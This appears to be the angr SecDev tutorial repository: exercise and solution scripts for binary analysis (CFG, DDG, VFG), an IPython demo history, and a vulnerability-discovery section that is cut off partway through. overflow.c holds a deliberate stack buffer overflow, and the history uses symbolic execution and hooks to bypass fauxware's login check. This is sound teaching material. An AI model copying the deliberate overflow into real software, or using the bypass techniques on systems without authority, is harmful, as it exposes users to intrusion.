├── README.md
├── cfg_accurate
    ├── 0.py
    ├── 0.solution.py
    ├── 1.py
    ├── 1.solution.py
    └── fauxware
├── cfg_fast
    ├── 0.py
    ├── 0.solution.py
    ├── 1.py
    ├── 1.solution.py
    ├── cfg_2
    └── fauxware
├── ddg
    ├── 0.py
    ├── 0.solution.py
    └── fauxware
├── ipython_history.txt
├── vfg
    ├── 0.py
    ├── 0.solution.py
    └── fauxware
├── vuln_discovery
    ├── overflow
    ├── overflow.c
    ├── vuln.py
    └── vuln.solution.py
├── vuln_discovery_2
    ├── overflow3-28d8a442fb232c0c
    ├── overflow3-28d8a442fb232c0c.c
    ├── overflow3.py
    └── overflow3.solution.py
└── vuln_discovery_simple
    ├── overflow3-simplified
    ├── overflow3-simplified.c
    ├── overflow3.py
    └── overflow3.solution.py


/README.md:
--------------------------------------------------------------------------------
1 | 
2 | # SecDev angr Tutorial
3 | 
4 | The slides are [here](https://goo.gl/YHdmDB).
5 | 


--------------------------------------------------------------------------------
/cfg_accurate/0.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | '''
 4 | Generate an accurate CFG on the fauxware binary, and take a look at its program states.
 5 | '''
 6 | 
 7 | import angr
 8 | 
 9 | # load the binary
10 | project = angr.Project("fauxware")
11 | 
12 | # WRITEME: generate an accurate CFG
13 | # since we want to see its program states generated during CFG recovery, we should specify 'keep_state=True'
14 | cfg = None
15 | 
16 | # Alright, we got it!
17 | if cfg is not None:
18 |     all_nodes = cfg.nodes()
19 | 
20 |     for n in all_nodes:
21 |         print("%s:\t\tstate %s, eax %s, ecx %s" % (n, n.input_state, n.input_state.regs.eax, n.input_state.regs.ecx))
22 | 
23 | 


--------------------------------------------------------------------------------
/cfg_accurate/0.solution.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | '''
 4 | Generate an accurate CFG on the fauxware binary, and take a look at its program states.
 5 | '''
 6 | 
 7 | import angr
 8 | 
 9 | # load the binary
10 | project = angr.Project("fauxware")
11 | 
12 | # WRITEME: generate an accurate CFG
13 | # since we want to see its program states generated during CFG recovery, we should specify 'keep_state=True'
14 | cfg = project.analyses.CFGAccurate(keep_state=True)
15 | 
16 | # Alright, we got it!
17 | if cfg is not None:
18 |     all_nodes = cfg.nodes()
19 | 
20 |     for n in all_nodes:
21 |         print("%s:\t\tstate %s, eax %s, ecx %s" % (n, n.input_state, n.input_state.regs.eax, n.input_state.regs.ecx))
22 | 
23 | 


--------------------------------------------------------------------------------
/cfg_accurate/1.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | '''
 4 | Demonstrate how to normalize a CFG
 5 | '''
 6 | 
 7 | from pprint import pprint
 8 | 
 9 | import angr
10 | 
11 | # load the binary
12 | project = angr.Project('fauxware')
13 | 
14 | # WRITEME: to generate a normalized CFG, simply specify `normalize=True` during initialization
15 | cfg_norm = None
16 | 
17 | # this is a normal CFG
18 | cfg = project.analyses.CFG()
19 | 
20 | # There should be some different nodes
21 | if cfg_norm is not None:
22 |     nodes_norm = cfg_norm.nodes()
23 |     nodes = cfg.nodes()
24 | 
25 |     nodes_only_in_normalized = set()
26 | 
27 |     for n in nodes_norm:
28 |         if any([nn for nn in nodes if nn.addr == n.addr and nn.size == n.size]):
29 |             continue
30 |         nodes_only_in_normalized.add(n)
31 | 
32 |     assert nodes_only_in_normalized
33 |     pprint(nodes_only_in_normalized)
34 | 
35 | 


--------------------------------------------------------------------------------
/cfg_accurate/1.solution.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | '''
 4 | Demonstrate how to normalize a CFG
 5 | '''
 6 | 
 7 | from pprint import pprint
 8 | 
 9 | import angr
10 | 
11 | # load the binary
12 | project = angr.Project('fauxware')
13 | 
14 | # WRITEME: to generate a normalized CFG, simply specify `normalize=True` during initialization
15 | cfg_norm = project.analyses.CFG(normalize=True)
16 | 
17 | # this is a normal CFG
18 | cfg = project.analyses.CFG()
19 | 
20 | # There should be some different nodes
21 | if cfg_norm is not None:
22 |     nodes_norm = cfg_norm.nodes()
23 |     nodes = cfg.nodes()
24 | 
25 |     nodes_only_in_normalized = set()
26 | 
27 |     for n in nodes_norm:
28 |         if any([nn for nn in nodes if nn.addr == n.addr and nn.size == n.size]):
29 |             continue
30 |         nodes_only_in_normalized.add(n)
31 | 
32 |     assert nodes_only_in_normalized
33 |     pprint(nodes_only_in_normalized)
34 | 
35 | 


--------------------------------------------------------------------------------
/cfg_accurate/fauxware:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/cfg_accurate/fauxware


--------------------------------------------------------------------------------
/cfg_fast/0.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from pprint import pprint
 4 | 
 5 | import angr
 6 | 
 7 | project = angr.Project("fauxware")
 8 | 
 9 | # WRITEME: generate a CFG
10 | cfg = None
11 | 
12 | # WRITEME: print out all nodes
13 | all_nodes = None
14 | pprint(all_nodes)
15 | 
16 | # WRITEME: get any CFG node whose address is 0x80485fc
17 | # 0x80485fc is the address of main()
18 | node = None
19 | print("Node 0x80485fc: %s" % node)
20 | 
21 | # WRITEME: get all CFG node whose address is 0x80485fc
22 | node_list = None
23 | print("All node whose address is 0x80485fc: %s" % node_list)
24 | 
25 | # WRITEME: get a list of successors of that node, including the fakeret target, using methods from the CFG
26 | successors = None
27 | print("All successors to node %s are:" % node)
28 | pprint(successors)
29 | 
30 | # WRITEME: get a list of successors of that node, using the `successor` property from the CFG node itself
31 | # this time it does not include the fakeret target
32 | successors = None
33 | print("All successors to node %s are:" % node)
34 | pprint(successors)
35 | 
36 | 


--------------------------------------------------------------------------------
/cfg_fast/0.solution.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from pprint import pprint
 4 | 
 5 | import angr
 6 | 
 7 | project = angr.Project("fauxware")
 8 | 
 9 | # WRITEME: generate a CFG
10 | cfg = project.analyses.CFG()
11 | 
12 | # WRITEME: print out all nodes
13 | all_nodes = cfg.nodes()
14 | pprint(all_nodes)
15 | 
16 | # WRITEME: get any CFG node whose address is 0x80485fc
17 | # 0x80485fc is the address of main()
18 | node = cfg.get_any_node(0x80485fc)
19 | print("Node 0x80485fc: %s" % node)
20 | 
21 | # WRITEME: get all CFG node whose address is 0x80485fc
22 | node_list = cfg.get_all_nodes(0x80485fc)
23 | print("All node whose address is 0x80485fc: %s" % node_list)
24 | 
25 | # WRITEME: get a list of successors of that node, including the fakeret target, using methods from the CFG
26 | successors = cfg.get_successors(node, excluding_fakeret=False)
27 | print("All successors to node %s are:" % node)
28 | pprint(successors)
29 | 
30 | # WRITEME: get a list of successors of that node, using the `successor` property from the CFG node itself
31 | # this time it does not include the fakeret target
32 | successors = node.successors
33 | print("All successors to node %s are:" % node)
34 | pprint(successors)
35 | 
36 | 


--------------------------------------------------------------------------------
/cfg_fast/1.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from pprint import pprint
 4 | 
 5 | import angr
 6 | 
 7 | p = angr.Project("cfg_2")
 8 | 
 9 | # WRITEME: generate a CFG that collects data references during CFG recovery
10 | # Note that by default it resolves indirect jumps (like jump tables)
11 | cfg = None
12 | 
13 | # WRITEME: print out the recovered indirect jumps
14 | indirect_jumps = None
15 | print("Here are all indirect jumps from the binary:")
16 | pprint(indirect_jumps)
17 | 
18 | # WRITEME: print out the recovered list of memory data
19 | memory_data = None
20 | print("Here are all recovered memory data from the binary:")
21 | pprint(memory_data)
22 | 
23 | # WRITEME: print out the reversed map between instruction addresses to memory data
24 | ins_to_memdata = None
25 | print("Here is a mapping between instruction address and memory data:")
26 | pprint(ins_to_memdata)
27 | 
28 | 


--------------------------------------------------------------------------------
/cfg_fast/1.solution.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from pprint import pprint
 4 | 
 5 | import angr
 6 | 
 7 | p = angr.Project("cfg_2")
 8 | 
 9 | # WRITEME: generate a CFG that collects data references during CFG recovery
10 | # Note that by default it resolves indirect jumps (like jump tables)
11 | cfg = p.analyses.CFG(collect_data_references=True)
12 | 
13 | # WRITEME: print out the recovered indirect jumps
14 | indirect_jumps = cfg.indirect_jumps
15 | print("Here are all indirect jumps from the binary:")
16 | pprint(indirect_jumps)
17 | 
18 | # WRITEME: print out the recovered list of memory data
19 | memory_data = cfg.memory_data
20 | print("Here are all recovered memory data from the binary:")
21 | pprint(memory_data)
22 | 
23 | # WRITEME: print out the reversed map between instruction addresses to memory data
24 | ins_to_memdata = cfg._insn_addr_to_memory_data
25 | print("Here is a mapping between instruction address and memory data:")
26 | pprint(ins_to_memdata)
27 | 
28 | 


--------------------------------------------------------------------------------
/cfg_fast/cfg_2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/cfg_fast/cfg_2


--------------------------------------------------------------------------------
/cfg_fast/fauxware:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/cfg_fast/fauxware


--------------------------------------------------------------------------------
/ddg/0.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | '''
 4 | We'd like to figure out the dependency between registers and memory variables in function authenticate
 5 | '''
 6 | 
 7 | from pprint import pprint
 8 | 
 9 | import angr
10 | 
11 | # load the project
12 | 
13 | p = angr.Project("fauxware")
14 | 
15 | # WRITEME: get the address of function `authenticate`
16 | cfg_fast = None
17 | main_func = None
18 | auth_func = None
19 | 
20 | # Note: we create a new knowledge base to use with CFGAccurate and DDG analysis
21 | # we don't want to mess with the default (project-level) knowledge base
22 | # this is just a good habit :-)
23 | kb = angr.knowledge_base.KnowledgeBase(p, p.loader.main_bin)
24 | 
25 | # WRITEME: generate an accurate CFG
26 | # Recommended parameters:
27 | # starts=(main_func,addr,)
28 | # context_sensitivity_level=2
29 | # keep_state=True  # states must be kept and stored to allow dependence analysis later
30 | cfg = None
31 | 
32 | # WRITEME: initialize DDG analysis with the accurate CFG and the new knowledge base, and specify the `start`
33 | ddg = None
34 | 
35 | if ddg is not None:
36 |     # YES it's done! Let's see what's there
37 |     print("=== Statement Dependence Graph ===")
38 |     print("Edges:")
39 |     edges = ddg.graph.edges(data=True)
40 |     pprint(edges, width=120)
41 | 
42 |     print("=== Data Dependence Graph ===")
43 |     print("Edges:")
44 |     edges = ddg.data_graph.edges(data=True)
45 |     pprint(edges, width=120)
46 | 
47 |     print("=== Simplified Data Dependence Graph ===")
48 |     print("Edges:")
49 |     edges = ddg.simplified_data_graph.edges(data=True)
50 |     pprint(edges, width=120)
51 | 
52 | 


--------------------------------------------------------------------------------
/ddg/0.solution.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | '''
 4 | We'd like to figure out the dependency between registers and memory variables in function authenticate
 5 | '''
 6 | 
 7 | from pprint import pprint
 8 | 
 9 | import angr
10 | 
11 | # load the project
12 | 
13 | p = angr.Project("fauxware")
14 | 
15 | # WRITEME: get the address of function `authenticate`
16 | cfg_fast = p.analyses.CFG()
17 | main_func = p.kb.functions.function(name='main')
18 | auth_func = p.kb.functions.function(name='authenticate')
19 | 
20 | # Note: we create a new knowledge base to use with CFGAccurate and DDG analysis
21 | # we don't want to mess with the default (project-level) knowledge base
22 | # this is just a good habit :-)
23 | kb = angr.knowledge_base.KnowledgeBase(p, p.loader.main_bin)
24 | 
25 | # WRITEME: generate an accurate CFG
26 | # Recommended parameters:
27 | # starts=(main_func,addr,)
28 | # context_sensitivity_level=2
29 | # keep_state=True  # states must be kept and stored to allow dependence analysis later
30 | cfg = p.analyses.CFGAccurate(starts=(main_func.addr,),
31 |                              context_sensitivity_level=2,
32 |                              keep_state=True
33 |                              )
34 | 
35 | # WRITEME: initialize DDG analysis with the accurate CFG and the new knowledge base
36 | ddg = p.analyses.DDG(cfg=cfg, start=auth_func.addr, kb=kb)
37 | 
38 | if ddg is not None:
39 |     # YES it's done! Let's see what's there
40 |     print("=== Statement Dependence Graph ===")
41 |     print("Edges:")
42 |     edges = ddg.graph.edges(data=True)
43 |     pprint(edges, width=120)
44 | 
45 |     print("=== Data Dependence Graph ===")
46 |     print("Edges:")
47 |     edges = ddg.data_graph.edges(data=True)
48 |     pprint(edges, width=120)
49 | 
50 |     print("=== Simplified Data Dependence Graph ===")
51 |     print("Edges:")
52 |     edges = ddg.simplified_data_graph.edges(data=True)
53 |     pprint(edges, width=120)
54 | 
55 | 


--------------------------------------------------------------------------------
/ddg/fauxware:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/ddg/fauxware


--------------------------------------------------------------------------------
/ipython_history.txt:
--------------------------------------------------------------------------------
  1 | 
  2 | # Captured on Windows 10 with Python 2.7.11 + IPython 5.1.0
  3 | 
  4 | # This is the beginning of IPython history
  5 | import angr
  6 | 
  7 | # Load a the fauxware project
  8 | project = angr.Project("fauxware/fauxware")
  9 | project.loader.main_bin
 10 | project.loader.main_object
 11 | project.loader.all_objects
 12 | project.loader.main_object.imports
 13 | project.loader.main_object.sections
 14 | type(project.loader.main_object.sections)
 15 | project.loader.main_object.sections
 16 | project.loader.main_object.sections.raw_list
 17 | 
 18 | winproject = angr.Project("C:/Windows/System32/notepad.exe")  # it took a long time and did not finish, Yan had to ctrl-c it.
 19 | 
 20 | winproject = angr.Project("C:/Windows/System32/notepad.exe", auto_load_libs=False)  # this finished very quickly
 21 | winproject.loader.missing_dependencies
 22 | winproject.loader.all_objects
 23 | winproject.loader.main_object.imports
 24 | winproject.loader.main_object.sections
 25 | winproject.loader.main_object.sections.raw_list
 26 | cfg = winproject.analyses.CFG()
 27 | cfg = winproject.analyses.CFG(show_progressbar=True)
 28 | len(cfg.nodes())
 29 | cfg.nodes()
 30 | cfg.graph
 31 | cfg.graph.edges()
 32 | winproject.kb
 33 | winproject.kb.callgraph
 34 | winproject.kb.callgraph.edges()
 35 | [ map(hex, x) for x in winproject.kb.callgraph.edges() ]
 36 | 
 37 | history  # Yan was demonstrating the "history" command in IPython
 38 | 
 39 | winproject.kb
 40 | winproject.kb.functions
 41 | winproject.kb.functions[project.entry]
 42 | winproject.kb.functions[winproject.entry]
 43 | entry_function = winproject.kb.functions[winproject.entry]
 44 | entry_function.graph
 45 | entry_function.graph.edges()
 46 | entry_function.blocks
 47 | list(entry_function.blocks)
 48 | entry_function.code_constants
 49 | 
 50 | # Print out all blocks
 51 | for block in entry_function.blocks: print block
 52 | 
 53 | # Print out the disassembly of all blocks
 54 | for block in entry_function.blocks: block.pp()
 55 | 
 56 | # Print the VEX IR of all blocks
 57 | for block in entry_function.blocks: block.vex.pp()
 58 | 
 59 | block = winproject.factory.block(0x14001957e)
 60 | block.pp()
 61 | simgr = winproject.factory.simulation_manager()
 62 | simgr
 63 | simgr.active[0]
 64 | simgr.active[0].regs.rax
 65 | simgr.active[0].regs.rcx
 66 | simgr.step()
 67 | simgr.step()
 68 | simgr.step()
 69 | simgr.active[0]
 70 | simgr.step()
 71 | simgr.active[0]
 72 | cfg.get_any_node(0x141000730)
 73 | cfg
 74 | 
 75 | simgr = project.factory.simulation_manager()
 76 | cfg = project.analyses.CFG(show_progressbar=True)
 77 | 
 78 | simgr.step()
 79 | simgr.active[0]
 80 | simgr.step()
 81 | simgr.active[0]
 82 | cfg.get_any_node(0x400540)
 83 | cfg.get_any_node(0x400540).successors
 84 | simgr.step(until=lamda sm: len(sm.active) != 1)
 85 | simgr.step(until=lambda sm: len(sm.active) != 1)
 86 | simgr.active
 87 | simgr.active[0].history
 88 | simgr.active[0].history.bbl_addrs
 89 | list(simgr.active[0].history.bbl_addrs)
 90 | map(hex, list(simgr.active[0].history.bbl_addrs))
 91 | project.loader.describe_addr(0x1000020)
 92 | map(hex, list(simgr.active[0].history.descriptions))
 93 | maplist(simgr.active[0].history.descriptions)
 94 | list(simgr.active[0].history.descriptions)
 95 | 
 96 | cfg.get_any_node(0x40068e)
 97 | cfg.get_any_node(0x40068e).successors
 98 | state = simgr.active[0]
 99 | 
100 | state.history
101 | state.history.actions
102 | list(state.history.actions)
103 | list(state.history.guards)
104 | list(state.history.jump_guards)
105 | list(simgr.active[0].history.jump_guards)
106 | list(simgr.active[1].history.jump_guards)
107 | 
108 | simgr.active[0].rax
109 | simgr.active[0].regs.rax
110 | simgr.active[1].regs.rax
111 | state.memory.load(state.regs.rsp, 8)
112 | state.memory.load(state.regs.rsp, 8, endness="Iend_LE")
113 | 
114 | state.posix.files
115 | stdin = state.posix.files[0]
116 | stdin.all_bytes()
117 | state.solver.eval(state.posix.files[0])
118 | state.solver.eval(state.posix.files[0].all_bytes())
119 | state.solver.eval(state.posix.files[0].all_bytes(), cast_to=str)
120 | state = simgr.active[1]
121 | state.solver.eval(state.posix.files[0].all_bytes(), cast_to=str)
122 | state.solver.eval_upto(state.posix.files[0].all_bytes(), 10, cast_to=str)
123 | stdin = state.posix.files[0]
124 | state = simgr.active[0]
125 | state.solver.eval_upto(state.posix.files[0].all_bytes(), 10, cast_to=str)
126 | state.posix.files[0]
127 | stdin.read_from
128 | stdin.read_from?
129 | stdin.read_pos?
130 | stdin.read?
131 | stdin.contents
132 | stdin.content
133 | stdin.content.load(10, 8)
134 | state.solver.eval_upto(stdin.content.load(9, 8), 10, cast_to=str)
135 | simgr.active
136 | simgr.mp_active
137 | simgr.mp_active.regs.rax
138 | simgr.mp_active.regs.rax.mp_items
139 | simgr.mp_active.solver.eval_upto(simgr.mp_active.files[0].content.load(9, 8), 1, cast_to=str)
140 | simgr.mp_active.solver.eval_upto(simgr.mp_active.posix.files[0].content.load(9, 8), 1, cast_to=str)
141 | simgr.mp_active.solver.eval_upto(simgr.mp_active.posix.files[0].content.load(9, 8), 1, cast_to=str).mp_items
142 | state.history.jump_guard
143 | 
144 | state.history.jump_guard.op
145 | state.history.jump_guard.args
146 | state.history.jump_guard.args
147 | state.history.jump_guard.args[0]
148 | state.history.jump_guard.args[0]
149 | state.history.jump_guard.args[0] + 0
150 | simgr.run()
151 | 
152 | simgr.mp_active.solver.eval_upto(simgr.mp_active.posix.files[0].content.load(9, 8), 2, cast_to=str).mp_items
153 | simgr.mp_deadended.solver.eval_upto(simgr.mp_deadended.posix.files[0].content.load(9, 8), 2, cast_to=str).mp_items
154 | simgr.mp_active.solver.eval_upto(simgr.mp_active.posix.files[1].all_bytes(), 2, cast_to=str).mp_items
155 | simgr.mp_deadended.solver.eval_upto(simgr.mp_deadended.posix.files[1].all_bytes(), 2, cast_to=str).mp_items
156 | simgr.mp_deadended.posix.files
157 | simgr.mp_deadended.posix.files.mp_items
158 | simgr.mp_deadended.solver.constraints
159 | simgr.mp_deadended.solver.jump_guards.mp_map(list)
160 | simgr.mp_deadended.history.jump_guards.mp_map(list)
161 | simgr.mp_deadended.history.jump_guards.mp_map(list).mp_items
162 | simgr = project.factory.simulation_manager()
163 | simgr
164 | 
165 | cfg.functions
166 | cfg.functions.keys()
167 | project.loader.main_object.symbols_by_addr
168 | project.kb.functions['accepted']
169 | 
170 | simgr.explore(find=project.kb.functions['accepted'].addr)
171 | simgr.found
172 | simgr.found.posix.dumps(0)
173 | simgr.found[0].posix.dumps(0)
174 | simgr = project.factory.simulation_manager()
175 | simgr
176 | 
177 | simgr.use_technique(angr.exploration_techniques.DFS())
178 | # Use the DFS exploration technique
179 | simgr._hooks_all
180 | simgr.step()
181 | simgr.step()
182 | simgr.step()
183 | simgr.step()
184 | simgr.step()
185 | simgr.step(until=lambda sm: 'deferred' in simgr.stashes)
186 | simgr.step(until=lambda sm: 'deferred' in simgr.stashes)
187 | simgr.step(until=lambda sm: 'deferred' in sm.stashes)
188 | sm.deferred
189 | simgr.step(until=lambda sm: len(sm.deferred) != 0)
190 | simgr.step()
191 | simgr.step()
192 | simgr.step(until=lambda sm: len(sm.deferred) != 0)
193 | simgr.step()
194 | simgr.step()
195 | simgr.step()
196 | simgr.step()
197 | simgr.step()
198 | simgr.step()
199 | simgr.step()
200 | simgr.step()
201 | simgr.step()
202 | simgr.step()
203 | simgr.step()
204 | simgr.step()
205 | simgr.step()
206 | simgr.step()
207 | simgr.step()
208 | simgr.step()
209 | simgr.step()
210 | simgr.step()
211 | simgr.step()
212 | simgr.step()
213 | simgr.step()
214 | simgr.step()
215 | simgr.step()
216 | simgr.step()
217 | simgr.step()
218 | simgr.step()
219 | simgr.step()
220 | simgr.step()
221 | simgr.step()
222 | simgr.step()
223 | simgr.step()
224 | simgr.step()
225 | simgr.step()
226 | simgr.step()
227 | simgr.step()
228 | simgr.step()
229 | simgr.step()
230 | simgr.step()
231 | simgr.step()
232 | simgr.step()
233 | simgr.step()
234 | simgr.step()
235 | def always_succeed(state): state.regs.rax = 1
236 | project.hook?
237 | project.hook(0x4007b9, always_succeed, length=0)
238 | 
239 | simgr = project.factory.simulation_manager()
240 | simgr.run()
241 | simgr.mp_deadended
242 | simgr.mp_deadended.posix.dumps(1)
243 | simgr.mp_deadended.posix.dumps(1).mp_items
244 | class Return0(angr.SimProcedure): def run(state): return 0
245 | class Return0(angr.SimProcedure):
246 |     def run(self, state):
247 |         return 0
248 | project = angr.Project("fauxware/fauxware")
249 | project.hook(0x400664, Return0)
250 | project.hook(0x400664, Return0())
251 | project.hook(0x400664, Return0(), replace=True)
252 | simgr = project.factory.simulation_manager()
253 | simgr.run()
254 | simgr.deadended[0].posix.dumps(1)
255 | simgr.deadended[0].posix.dumps(0)
256 | simgr.deadended[0].posix.dumps(1)
257 | simgr = winproject.factory.simulation_manager()
258 | simgr.step(n=10)
259 | simgr = winproject.factory.simulation_manager()
260 | simgr.step()
261 | simgr.step()
262 | simgr.step()
263 | simgr.step()
264 | simgr.step()
265 | simgr.step()
266 | simgr.step()
267 | simgr.step()
268 | simgr.step()
269 | simgr.step()
270 | simgr.step()
271 | debug
272 | 
273 | project = angr.Project("f:/angr/angr-doc/examples/whitehat_crypto400/whitehat_crypto400")
274 | project.loader.main_object
275 | project.loader.main_object.symbols_by_addr
276 | project.loader.main_object.imports
277 | project.loader.main_object
278 | project.loader.all_objects
279 | 
280 | simgr = project.factory.simulation_manager()
281 | simgr.step(until=lambda sm=len(sm.active) >= 10)
282 | simgr.step(until=lambda sm:len(sm.active) >= 10)
283 | simgr.step(until=lambda sm:len(sm.active) >= 20)
284 | simgr.step(until=lambda sm:len(sm.active) >=100)
285 | simgr
286 | 
287 | simgr.step(until=lambda sm:len(sm.active) >= 100)
288 | 
289 | # Use DFS instead of BFS for symbolic exploration
290 | simgr.use_technique(angr.exploration_techniques.DFS())
291 | simgr.step()
292 | simgr.step()
293 | simgr.step()
294 | simgr.step()
295 | simgr.step()
296 | simgr.step()
297 | simgr.step()
298 | simgr.step()
299 | simgr.step()
300 | simgr.step()
301 | simgr.step()
302 | simgr.step()
303 | simgr.step()
304 | simgr.step()
305 | simgr.step()
306 | simgr.step()
307 | simgr.step()
308 | simgr.step(n=10)
309 | simgr.step(n=10)
310 | simgr.step(n=10)
311 | simgr.step(n=10)
312 | simgr.step(n=10)
313 | simgr.step(n=100)
314 | simgr.step(n=100)
315 | 
316 | project
317 | project.kb
318 | project.kb.functions
319 | project.kb.functions.keys()
320 | cfg = project.analyses.CFG()
321 | project = angr.Project("fauxware/fauxware")
322 | cfg = project.analyses.CFG()
323 | project.kb.functions
324 | project.kb.functions.keys()
325 | project.kb.functions.values()
326 | project.kb.functions.values()[0]
327 | func = project.kb.functions.values()[0]
328 | func.name
329 | func.addr
330 | func.graph


--------------------------------------------------------------------------------
/vfg/0.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | '''
 4 | We'd like to understand the stack layout of the main function by performing generating a VFG on it.
 5 | '''
 6 | 
 7 | from pprint import pprint
 8 | from collections import defaultdict
 9 | 
10 | import angr
11 | 
12 | 
13 | # create the project
14 | project = angr.Project("fauxware")
15 | 
16 | # WRITEME: generate a CFG first so we have access to all functions
17 | cfg = None
18 | 
19 | # WRITEME: get the address of the main function
20 | main_func = None
21 | 
22 | # WRITEME: run VFG on it
23 | # Here is the suggested parameter setup
24 | # context_sensitivity_level: 3
25 | # interfunction_level: 3
26 | vfg = None
27 | print("VFG analysis is over. We have some nodes now:")
28 | if vfg is not None:
29 |     pprint(vfg.graph.nodes())
30 | 
31 | # WRITEME: get the input state to the very last basic block
32 | # the very last basic block in the main function is 0x80486e8
33 | # it should have captured all previous effects
34 | last_node = None
35 | last_state = None
36 | 
37 | # WRITEME: Get the memory object.
38 | # the memory used in static analysis is an abstract memory model (implemented in SimAbstractMemory)
39 | # it's basically a mapping from region names (like "stack_0x400000") to a symbolic memory instance (SimSymbolicMemory)
40 | memory = None
41 | print("Program memory of the very last state: %s" % memory)
42 | 
43 | # WRITEME: Let's take a look at the regions
44 | regions = None
45 | print("All memory regions on the stack:")
46 | pprint(regions)
47 | 
48 | if regions is not None:
49 |     # WRITEME: Now we can have a look at the abstract locations (alocs) of the main function's stack region
50 |     main_func_region = None
51 |     alocs = None
52 | 
53 |     print("Abstract locations of the main procedure are:")
54 |     pprint(alocs)
55 | 
56 |     # WRITEME: Derive stack layout information from abstract locations
57 |     # you may did a little bit into the source code SimuVEX and claripy to see what members an aloc has.
58 |     # related code are abstract_memory.py in SimuVEX and the vsa subpackage in claripy.
59 |     # by default, region.alocs is a dict mapping (block address, statement ID) to a list of memory targets.
60 |     # what we want is a list of stack offset and size of the corresponding memory access
61 |     # let's do it here
62 | 
63 |     stack_layout = defaultdict(set)  # map offset to size
64 | 
65 |     # WRITEME: traverse alocs
66 | 
67 |     print("The stack layout looks like:")
68 |     for offset in sorted(stack_layout.keys(), reverse=True):
69 |         print("%#x %s" % (offset, stack_layout[offset]))
70 | 
71 | 


--------------------------------------------------------------------------------
/vfg/0.solution.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | '''
 4 | We'd like to understand the stack layout of the main function by performing generating a VFG on it.
 5 | '''
 6 | 
 7 | from pprint import pprint
 8 | from collections import defaultdict
 9 | 
10 | import angr
11 | 
12 | 
13 | # create the project
14 | project = angr.Project("fauxware")
15 | 
16 | # WRITEME: generate a CFG first so we have access to all functions
17 | cfg = project.analyses.CFG()
18 | 
19 | # WRITEME: get the address of the main function
20 | main_func = project.kb.functions.function(name='main')
21 | 
22 | # WRITEME: run VFG on it
23 | # Here is the suggested parameter setup
24 | # context_sensitivity_level: 3
25 | # interfunction_level: 3
26 | vfg = project.analyses.VFG(start=main_func.addr,
27 |                            context_sensitivity_level=3,
28 |                            interfunction_level=3
29 |                            )
30 | print("VFG analysis is over. We have some nodes now:")
31 | pprint(vfg.graph.nodes())
32 | 
33 | # WRITEME: get the input state to the very last basic block
34 | # the very last basic block in the main function is 0x80486e8
35 | # it should have captured all previous effects
36 | last_node = vfg.get_any_node(0x80486e8)
37 | last_state = last_node.state
38 | 
39 | # WRITEME: Get the memory object.
40 | # the memory used in static analysis is an abstract memory model (implemented in SimAbstractMemory)
41 | # it's basically a mapping from region names (like "stack_0x400000") to a symbolic memory instance (SimSymbolicMemory)
42 | memory = last_state.memory
43 | print("Program memory of the very last state: %s" % memory)
44 | 
45 | # WRITEME: Let's take a look at the regions
46 | regions = memory.regions
47 | print("All memory regions on the stack:")
48 | pprint(regions)
49 | 
50 | if regions is not None:
51 |     # WRITEME: Now we can have a look at the abstract locations (alocs) of the main function's stack region
52 |     main_func_region = regions.get('stack_%#x' % main_func.addr)
53 |     alocs = main_func_region.alocs
54 | 
55 |     print("Abstract locations of the main procedure are:")
56 |     pprint(alocs)
57 | 
58 |     # WRITEME: Derive stack layout information from abstract locations
59 |     # you may did a little bit into the source code SimuVEX and claripy to see what members an aloc has.
60 |     # related code are abstract_memory.py in SimuVEX and the vsa subpackage in claripy.
61 |     # by default, region.alocs is a dict mapping (block address, statement ID) to a list of memory targets.
62 |     # what we want is a list of stack offset and size of the corresponding memory access
63 |     # let's do it here
64 | 
65 |     stack_layout = defaultdict(set)  # map offset to size
66 |     for aloc in alocs.values():
67 |         for segment in aloc._segment_list:
68 |             stack_layout[segment.offset].add(segment.size)
69 | 
70 |     print("The stack layout looks like:")
71 |     for offset in sorted(stack_layout.keys(), reverse=True):
72 |         print("%#x %s" % (offset, stack_layout[offset]))
73 | 
74 | 


--------------------------------------------------------------------------------
/vfg/fauxware:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/vfg/fauxware


--------------------------------------------------------------------------------
/vuln_discovery/overflow:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/vuln_discovery/overflow


--------------------------------------------------------------------------------
/vuln_discovery/overflow.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <unistd.h>
 3 | 
 4 | int main()
 5 | {
 6 | 	char buf[128];
 7 | 	unsigned char size;
 8 | 
 9 | 	printf("How much to read? ");
10 | 	scanf("%hhd\n", &size);
11 | 
12 | 	if (size > 128) printf("Uh oh, reading up to %d bytes...\n", size);
13 | 	printf("Received: %d bytes.\n", fread(buf, 1, size, stdin));
14 | }
15 | 


--------------------------------------------------------------------------------
/vuln_discovery/vuln.py:
--------------------------------------------------------------------------------
 1 | import angr
 2 | 
 3 | # load the binary
 4 | project = angr.Project("overflow", load_options={ 'auto_load_libs': False })
 5 | 
 6 | # Make a simple security checker that checks for an overflow into the return address. There are several cases:
 7 | #
